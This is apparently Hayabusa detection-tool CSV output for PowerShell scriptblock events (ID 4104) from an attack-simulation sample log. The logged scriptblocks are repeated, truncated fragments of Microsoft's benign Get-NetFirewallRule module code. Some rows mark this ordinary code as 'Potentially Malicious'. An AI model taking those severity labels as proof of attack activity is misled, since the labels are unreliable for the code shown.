[Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssoci",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.904 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Dependents'; ParameterType = 
'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameter.ParameterTypeName = 'Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement' $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('EnumerateFull', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Show-NetFirewallRule' -Alias '*' function Get-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssoci",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.904 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"atedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [int] 
${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') 
} if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) 
$__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 
'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${Associ",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.904 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"atedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) 
$__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 
'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 